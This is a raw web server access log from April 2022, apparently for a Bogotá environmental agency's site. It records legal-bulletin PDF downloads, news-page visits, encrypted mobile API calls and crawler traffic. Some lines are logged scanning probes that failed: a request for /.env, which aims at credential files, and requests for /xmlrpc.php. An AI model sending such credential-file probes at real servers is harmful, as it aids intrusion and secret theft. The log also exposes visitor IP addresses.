181.53.13.95 - - [16/Apr/2022:16:44:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/W+/KuSJTB5cG/hkTvhX5UEWEflmbBnctmJNiEWO2JghEyGmz5m7FZu+EeATTU6+4xsk0Adxq1Oifu8hXaGn+sERgLwHR9pQqXPQUBvg94hgrGTzYaJsKS7Pj6nOzkjSFUTHH1qdaA1KBKgtb4eYslwWNu3OjFYH9eXEMPF8bRgGwrpQa00Nf4wXB1KQb0fe4K+06HbZXnMkQnwDvxUt0v8NVQEoB4i+WNispcSwzi/cUmT4xCMT1ElG9pvwCH4JoFYD6VZmPHc7Es5rSa5OUS/lXfC0n3E0aWao6PICYBzsffQaEVFr+mB4Su6oWtX3tJalcmXgBB+kORaZ+dosC1SFehxbzC/nAT8MVmkQ6IilSxKPrK68UACkH0Tp7n1otlcYoTRgz21DbPRsm4K7AcowlPANCz858j5nxXMTsA7Db1MqYkpwfrkOyI907+7GiUZTWPzlve4MIQdD0WEapKgGYcV//e15yxGXokYNBZbqlxbwq4DRtqRPvgYXeCsw33izQ5JDUI/KZODh7wbPl76psMVXPuc0OPNwT2N8CY7IIKD1Dd+NW85EfldsAp419Me8adWwYGhKYZBWUV4o3LXJ+B2/lWpxhUbbutpfSu/l12wEvzmqP+92jSjfzYCZDPEIJMtt7gw6mVE0JSUgV83J/hb8sjip2kQUR2QTBT9qDuB1Dxtk/dPKaZBLZi6cRCk3nH1oMiVlA2hezNdioemUYiHP3mrvdWggEroDnpA8U+WFQdGsLoz5+wsr2OFkLHFQnAyn5sJXS4Xrc6INe3T7wvF/Ege3q8N6vOPu9t3M8/GoNbGcJIrlrcmU2+ScNAwWFnKDZIg+DkYKKTTqVdUIYQU/fqFgMXzO9KaQ+Wb7YxacidJ9spRZieCEfAXoN+OwQ5ofNiI2Oyofyx4O5gxbwUT5ZJnaG07A9vnmx6pA5PUL73qRpX/mfNCDcQkxVsxAEwK7QJdB3hxGHK94xRKNxP66DqRc5W4dke8NLOcbbRnpTPL1goglJ7Q0uPPyFk3g4z0AZJquLeW4VtzUtyGXnePTItns7kzdXoB5h4E+o3MzBxAMv5HCV4rExf7zDRKFz0gtp6zC33m51vZeNjrucRk4KMLuN1i+sHv6WpK0e4XGv4MJZq&u=U2FsdGVkX1/gVpctFBaEstwb6Wm2NPvrfvtlmFRIbl2CK8P1zbCqQlkfOaVXcmAi&y=U2FsdGVkX1//V37cCZJkAG9x8iYzLGmh+BM4a7H8L36rNCRyoWUcMkhs17laoM0s HTTP/1.1" 200 942
181.53.13.95 - - [16/Apr/2022:16:44:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+uXRy4yfyHVZX/8RnWfAc8GIkEXk1ITDHMdX91ewLWbk9SsbavYV6S&u=U2FsdGVkX1/gVpctFBaEstwb6Wm2NPvrfvtlmFRIbl2CK8P1zbCqQlkfOaVXcmAi&y=U2FsdGVkX1//V37cCZJkAG9x8iYzLGmh+BM4a7H8L36rNCRyoWUcMkhs17laoM0s HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:16:44:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+OU6DqAzCAWbr6ecT1HdVPICSM6fTsAB0dKUB8M2vyfVnvOfvUSIs0&u=U2FsdGVkX1/gVpctFBaEstwb6Wm2NPvrfvtlmFRIbl2CK8P1zbCqQlkfOaVXcmAi&y=U2FsdGVkX1//V37cCZJkAG9x8iYzLGmh+BM4a7H8L36rNCRyoWUcMkhs17laoM0s HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:16:44:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+jnebEOH5bpw+ZMDkzJh3i08v5o1gJzzTiYD9BcR4kTsIu4tpIBFbo&u=U2FsdGVkX1/gVpctFBaEstwb6Wm2NPvrfvtlmFRIbl2CK8P1zbCqQlkfOaVXcmAi&y=U2FsdGVkX1//V37cCZJkAG9x8iYzLGmh+BM4a7H8L36rNCRyoWUcMkhs17laoM0s HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:16:44:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18oyyyahAiR6QWbxQRJDujXRQl0kVlLVzRuxQIYSuy2pwhGefHi14lQEyUBOi3YDOK0BaM47vfV/wi/ZkyS+SPrs13OHIvuj4HAPic1OHQw3NR4H11TWPGOEJy9uO2ZcTfs9IoAAWYc1enXmPe9KSicvbXfhg1qUqHOVwqDcEx49KefPwQD6yxIG560g3V3tlyFDqNcIxp/GQ2nFMVnH6S7gYRDEc4SbotujpJdRbXguKjsrejyiFNKL6CpxeaR5qn7uXd1u8X2xL144uc11/KX14HAAln4Sn1uOe7QVzCgrhujMpxevCKst65ChpgtjhsNNJxPzlI5uW8BfJWUhLClgIerM3VJFDo=&u=U2FsdGVkX1/gVpctFBaEstwb6Wm2NPvrfvtlmFRIbl2CK8P1zbCqQlkfOaVXcmAi&y=U2FsdGVkX1//V37cCZJkAG9x8iYzLGmh+BM4a7H8L36rNCRyoWUcMkhs17laoM0s HTTP/1.1" 200 196
181.53.13.95 - - [16/Apr/2022:16:44:11 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19ykYpUh4gyRuAkZXWw43MPohBm9CRaCkQz7meycbjNxWRaPCA3xKut HTTP/1.1" 200 30975
201.245.192.253 - - [16/Apr/2022:16:43:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45490
172.22.2.4 - - [16/Apr/2022:16:44:22 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
172.22.2.4 - - [16/Apr/2022:16:42:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:16:44:28 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
172.22.2.4 - - [16/Apr/2022:16:44:34 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [16/Apr/2022:16:44:40 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [16/Apr/2022:16:44:42 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
172.22.2.4 - - [16/Apr/2022:16:44:47 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
172.22.2.4 - - [16/Apr/2022:16:43:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
172.22.2.4 - - [16/Apr/2022:16:45:59 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%209%20del%2003%20de%20Noviembre%20de%202011.pdf HTTP/1.1" 200 54568
172.22.2.4 - - [16/Apr/2022:16:46:05 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
172.22.2.4 - - [16/Apr/2022:16:46:13 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 1107785
172.22.2.4 - - [16/Apr/2022:16:46:28 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 314873
172.22.2.4 - - [16/Apr/2022:16:46:33 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
172.22.2.4 - - [16/Apr/2022:16:46:42 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
172.22.2.4 - - [16/Apr/2022:16:46:50 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
216.245.221.92 - - [16/Apr/2022:16:48:18 -0500] "HEAD / HTTP/1.1" 200 -
103.178.237.132 - - [16/Apr/2022:16:49:17 -0500] "GET / HTTP/1.1" 200 319
211.140.23.130 - - [16/Apr/2022:16:49:38 -0500] "HEAD /images/buses-chimenea.jpg HTTP/1.1" 404 -
172.22.2.4 - - [16/Apr/2022:16:48:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:16:49:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
181.53.13.95 - - [16/Apr/2022:16:51:19 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19lR6egUwyFV4XDlyJ2h7kBw+O06xFzgahVgxfu/AGf+w1kmTd5bt45&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 30
181.53.13.95 - - [16/Apr/2022:16:51:19 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18LSaq1Of8lSdw/bU+Huwz6j3/sYUnIJu67taTKE+PNF9XW+gw0vNFD+Rtczxa7XLzJrA8GO2pGr5yioupDMIToLDnWwURyAr4=&u=U2FsdGVkX19lWarpcw+qF4xayNBjmrhFvqQNHku1ytu50kANcBqrBPEdzXn/Kkcw&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 97
181.53.13.95 - - [16/Apr/2022:16:51:19 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Jk7G9EpVUY6WmiB5kDVV6Q0h+xENVAGexLgNmGMbwxdJwEerAgBaol6WzpzEsIt0CyNearHjtGODg4tqva+zy8pdcanIRGiiYx9KzGEnSwk+RcnaKlALDuedskjww0BW1SLXLz6aahV+9tbvf+j6jBMdyEKuw/n8SIORP7VhtEirpre1JZqJUoKZnTCOlKdzuPLSiwoTHLHZLb7Bk0xjEU8gP9biCOh22LVpHAMfdP5OKdGcwv7+6hv9Mkd3TUk1HweS9UIr599j2gJ3h6FEvSpyAz1hxaDnJMctkz88vRUvW1+Rc5IQcFk/I8Fp4TtKYr8Tl5NeG2GthOEdLZNxADlQeiPC6Txq8oFylj9CP2beiOED9laRon3KwdGVKKRDS0CQ7VIsy+yqZ4znFDiI698uoMR8yr1iRhj+cdg8cogiMiWablbp/tMJHOps4OAX2sfCg2CGRMovQz7+9AOz3YIii+0/jJUwUdsSQN/swGsAJDqZbCX9NtlVSIZjvFpAABOe5NPvf0FLaEvcTYZaPrTq6WXn2ULFr/AoW2CuelmfHtiTO3+U6PceyA6OQPA6GyVZrL4/SQGz2rb1YATsjlihDeVf5f9CiFChj2V+CLhQLTKQz+2ZqpQMV3rikg/o16OTgXTYz/zKOlVrqNACBWREpJCFU3rO9jwVgl4Vk3aNfT0l3qDahyertyIAv4klC3+Vov1M4H7ov5Y3d9kVCoJU8RK4bCaPhQsyEWb2plfmbyfWv7wqfsSBVYNuCiZ9whcved1oNK1L5nOcIIHNAOd3IWtPTe21MZJ4Cj62fi34dGFBsXESfBUwOeHkeECKLil7u2CzVl4NJ8QpQis3nDMBuqDMidbpdwaIDA3YS5n2Lig8zyF0n1Tn606+7dttkYfWt/zb/MfFdEERPRjgnU3lTkNyDF2gixXfiUR3yDsDZuYqauqPjfy6ePpHMQ05sCArmAyWCjeQgAlevyki9T078zJhvOAEZ8vsKC0rn8zkCOy9uFuDaAFdcFuSpNG7nLn/IZR8LQSjdDbgUCXEo0GYI0hNrmObmzkc1MPe6fB/bMtQK/sk3pVRYzVvYn60Tjp4ZDU3/phLA9Rz45bzyUhVCSnhbY2i44zHbVXtt0rTAqz2NE4Y4&u=U2FsdGVkX19lWarpcw+qF4xayNBjmrhFvqQNHku1ytu50kANcBqrBPEdzXn/Kkcw&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 942
181.53.13.95 - - [16/Apr/2022:16:51:19 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX197rI3GljDv4NoFC1V+TDi+p/k2hsbXQR6yqv+TNOCduvdsaIc07o1v&u=U2FsdGVkX19lWarpcw+qF4xayNBjmrhFvqQNHku1ytu50kANcBqrBPEdzXn/Kkcw&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:16:51:19 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18up6fGBUR6jjfYkw0cmBOXdWfPcsCBPDKbcfrsv0WJdXVHfLq9WHlB&u=U2FsdGVkX19lWarpcw+qF4xayNBjmrhFvqQNHku1ytu50kANcBqrBPEdzXn/Kkcw&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:16:51:20 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX196OXBeKWW1z5eLFZNOC21CYMAFFjCTx74k1z8zFc1NpaCzgRxEyafs&u=U2FsdGVkX19lWarpcw+qF4xayNBjmrhFvqQNHku1ytu50kANcBqrBPEdzXn/Kkcw&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:16:51:20 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18/KVbObghbcZqOn0Qj/GhxUM9DvCcATCmIDAJR/WWVZ1za51xZ+2KoXbUzSuCmmJXG+zfA3ib8zFaZP2XY4mPTBS4qvT78m7NNwLkV1f+euEZi/lw+Yw+lgunDIaHUr/nK+lipPxfcGtpyR7tt/9qztgYFIKUGI75wX2+xad+RzU7DJQrE4+TUU2+FCObvCdtMR4GoBnjCxyG9K1wu/itHEgKEYmNI4sRHBri24gVIeplUuD/mWmRBkfOBPUHwTAAifTDMvSJOOSUu9a1PBFC3fSwJllywoKEaC59jg3X50Wy3kuGnMIYjl/HWyHCjBnZhRs/9ZE1vUaL3a8gWzrStdTTdEwiKJkg=&u=U2FsdGVkX19lWarpcw+qF4xayNBjmrhFvqQNHku1ytu50kANcBqrBPEdzXn/Kkcw&y=U2FsdGVkX18Z1hw9Nsm94QxiZCCD6WRetW7vPQEa18KPrKcsq7gj6cLhrvKcLDUq HTTP/1.1" 200 196
181.53.13.95 - - [16/Apr/2022:16:51:20 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19lR6egUwyFV4XDlyJ2h7kBw+O06xFzgahVgxfu/AGf+w1kmTd5bt45 HTTP/1.1" 200 30975
191.156.153.39 - - [16/Apr/2022:16:51:45 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
207.46.13.115 - - [16/Apr/2022:16:51:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
216.245.221.92 - - [16/Apr/2022:16:53:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.17 - - [16/Apr/2022:16:55:20 -0500] "-" 408 -
207.46.13.194 - - [16/Apr/2022:16:55:46 -0500] "GET /la-musica-como-bandera-para-el-cuidado-del-planeta.html HTTP/1.1" 200 855
172.22.2.4 - - [16/Apr/2022:16:54:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:16:55:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [16/Apr/2022:16:55:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
216.245.221.92 - - [16/Apr/2022:16:58:18 -0500] "HEAD / HTTP/1.1" 200 -
191.156.187.208 - - [16/Apr/2022:17:00:16 -0500] "GET /garza-azul-nueva-ave-registrada-en-el-humedal-el-burro.html HTTP/1.1" 200 890
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/wodGPXzIodd8IraFmglm+5NFIx9Oovyg724nfbYb8wJ0aCZhdBzgL&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 30
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX191Zz+ZOGnLXl5QLBxNL29efpZqCInCISjnfPWUtvAHtiGHeY3UgP4q4RSLuOTkMXjScXI38pexCj2iXL4wzBlWhsK2fEhtKFQ=&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 97
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+qoGeRgC9wsKvSWO5EQIvYBKXtTurO7Rljc+R7wuqjCbEf+sYC5UrVeklOiRV5BCcmuuNiElYU+sRsjWG5kFdV2SbktBzcQ/cx5tV8Zm748w+js/ZCVbXpkFuZTbwesfedh4yFCP8wnkb7sZtL3U4ec0xHOALKElPJA0gh5EraKUGx8vjj/GMGD4UTxl+OjRfdGMzxlHx82gSSvuoQLqIgqg3pWMf/A8eUWsKuH0IvSX4rm5l5Kv3B9G3dOnfz7wNEMPD1K9m5sTR/0SpqLWJhScT+vsXerc9isMyZuL4yJC3mMdC1U08/YK+sq4np2vggxRumIVMR8aduHiUnv763Llj6uct4hH6Hr9qNhdyT5mL2FkDtSx/z0nOnJCl8U1Hef9oihXeZNWAa04Wc0SJUHbRWmwijMZofardhB/bs38evn75ylF01YcZAiQ7HTMxZ3uyGfMeUl5uTSQI8VhnBB+D0UGeGcZ2KUJ6LI2zq7PIja844CN0tHM8WZnXDM73iFIugaQD80HFABnC2jEYLLIazZN7UyruyaN+Gpew6C5r/vnJuxaPuYP6Mxg3hRnO6z8oJY3IKuRx6wJCWQFMrpjbt9GMmszxtcTnc+YQmf/AaDwGQQBLNCmaqUEIk2LFEKPcBdaKgaDxFX2NprA/tYLdLLEl7WcSGfJU8N/4gxfiRq+y6/htf2e/xXML+lje7L5h4EOguXoyQdqykQDBttrf440h2WJ9GpxyXY/5K0jRSjMim3AQmGmNk46ubQHx92wN7c/THnxqCgBBuBPvYlBoEZ1soYNPabMz1ny6HI47ZFazhiNOCWUNqxqRzpoawc1sN0RQV+q1xWlLEmLcfr4Veirt7Yi/wyqyz7bLNcNdX6/NT01fbctI4/RHvUaxUVhvfFxiP1l0SCRkwPROMG1hakU3rcC6v5W8TqFKLqL52uhy0aLgvvWe861/jty4A/1WOLDRy1Y+RqXskyKR/e2r7AYYqR6Ybittbr5yujlNvypbydOvanPvCDoXE/KRyeTJAwVrBFMcpa9jpwDx5Tm5tOyLLinE7AzP/7LhcGhzjr5/SEoANS5qsBOq/xPJEvQDuHkkVGCoo0zwkWPvyGsdn1dUJgctRwDWrZ2ljwKwj16OlfDik&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 942
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/THwRWd+Bqltnh0FUsNR9tcXSHo9WDc2YqtB9/35+yzuzKFf/9wOqu&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/8yN9osuuKO4MQrksZSza0hln+nFRw9ky4mM6+82lV8/zFpwAnXV9r&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19j2cdRQwKpdjLKiq8G1mcGHWeRL0V9bze7iff/yWcF05Cq6iQuRzTs&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 70
181.53.13.95 - - [16/Apr/2022:17:00:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/70bGGH45qr4TDRxyJ04sA9CT5FF56xcQwmg52uUrI+erf6DYPzpzCZaHdt09UEYA4gd01HtNH/+xU56YBcnt0WwZr7N3EU4rcULeH9KUdAsEBbaMxQfETXKyfzYDf0G3HFGu2UiZdOdnuPG//Gf95dB5bZvR/MpC7NV6du2rIJpq4hesV2qeHHw5SRXP8GNdaGTl/Emk9916kD5Hrl3K0eQxwECaVaPwDGLflF3f99PeCCvuqIDdmsKI8+dEi3Sb0a5r3zS7gP7L8XiTZ4KMUIJCkDiGQCv5DIPBWcyPvdxZt+H+P+UxmjdIehxuxytasf4XLfKC8jdIUayNj113tSmsuD+FOV/U=&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 196
181.53.13.95 - - [16/Apr/2022:17:00:51 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/wodGPXzIodd8IraFmglm+5NFIx9Oovyg724nfbYb8wJ0aCZhdBzgL HTTP/1.1" 200 30975
172.22.2.4 - - [16/Apr/2022:17:00:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.220.149.17 - - [16/Apr/2022:17:02:12 -0500] "GET /images/feria-servicios-ambiental-barrios-unidos-17-marzo.jpg HTTP/1.1" 200 58797
172.22.2.4 - - [16/Apr/2022:17:01:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
35.236.215.231 - - [16/Apr/2022:17:03:10 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
35.236.215.231 - - [16/Apr/2022:17:03:11 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
216.245.221.92 - - [16/Apr/2022:17:03:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [16/Apr/2022:17:03:43 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:17:06:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Apr/2022:17:08:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:07:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
40.77.167.14 - - [16/Apr/2022:17:09:31 -0500] "GET / HTTP/1.1" 200 4720
109.237.103.38 - - [16/Apr/2022:17:10:48 -0500] "GET /.env HTTP/1.1" 404 1018
109.237.103.38 - - [16/Apr/2022:17:10:48 -0500] "\x16\x03\x01\x01C\x01" 400 226
172.22.2.4 - - [16/Apr/2022:17:12:09 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Apr/2022:17:12:09 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [16/Apr/2022:17:13:18 -0500] "HEAD / HTTP/1.1" 200 -
162.142.125.222 - - [16/Apr/2022:17:16:27 -0500] "GET / HTTP/1.1" 200 319
162.142.125.222 - - [16/Apr/2022:17:16:27 -0500] "GET / HTTP/1.1" 200 319
162.142.125.222 - - [16/Apr/2022:17:16:27 -0500] "PRI * HTTP/2.0" 400 946
216.245.221.92 - - [16/Apr/2022:17:18:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:20:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [16/Apr/2022:17:20:02 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [16/Apr/2022:17:20:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3110&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1155
186.154.68.147 - - [16/Apr/2022:17:20:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3110.pdf HTTP/1.1" 200 514354
172.22.2.4 - - [16/Apr/2022:17:19:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
42.193.193.231 - - [16/Apr/2022:17:20:34 -0500] "GET /xmlrpc.php HTTP/1.1" 404 1049
106.53.97.63 - - [16/Apr/2022:17:20:35 -0500] "GET /xmlrpc.php HTTP/1.1" 404 1049
114.119.149.89 - - [16/Apr/2022:17:20:48 -0500] "-" 408 -
191.156.146.151 - - [16/Apr/2022:17:21:58 -0500] "GET /se-abre-convocatoria-a-organizaciones-ambientales-para-generar-1-070-empleos-verdes-dirigidos-a-mujeres.html HTTP/1.1" 200 1128
173.252.111.9 - - [16/Apr/2022:17:22:02 -0500] "GET /se-abre-convocatoria-a-organizaciones-ambientales-para-generar-1-070-empleos-verdes-dirigidos-a-mujeres.html HTTP/1.1" 206 1128
172.22.2.4 - - [16/Apr/2022:17:20:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
172.22.2.4 - - [16/Apr/2022:17:21:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [16/Apr/2022:17:23:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Apr/2022:17:22:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45628
201.245.192.253 - - [16/Apr/2022:17:23:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
191.156.61.152 - - [16/Apr/2022:17:23:56 -0500] "-" 408 -
201.245.192.253 - - [16/Apr/2022:17:23:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45478
191.156.50.237 - - [16/Apr/2022:17:25:27 -0500] "-" 408 -
191.156.57.30 - - [16/Apr/2022:17:25:27 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:17:24:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
207.46.13.115 - - [16/Apr/2022:17:25:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
172.22.2.4 - - [16/Apr/2022:17:25:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.59.150.181 - - [16/Apr/2022:17:27:44 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
172.22.2.4 - - [16/Apr/2022:17:26:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
172.22.2.4 - - [16/Apr/2022:17:27:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3111&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1155
186.154.68.147 - - [16/Apr/2022:17:27:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3111.pdf HTTP/1.1" 200 583489
190.159.232.138 - - [16/Apr/2022:17:28:13 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
216.245.221.92 - - [16/Apr/2022:17:28:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:31:18 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [16/Apr/2022:17:31:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [16/Apr/2022:17:31:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=4841&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 1024
172.22.2.4 - - [16/Apr/2022:17:31:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
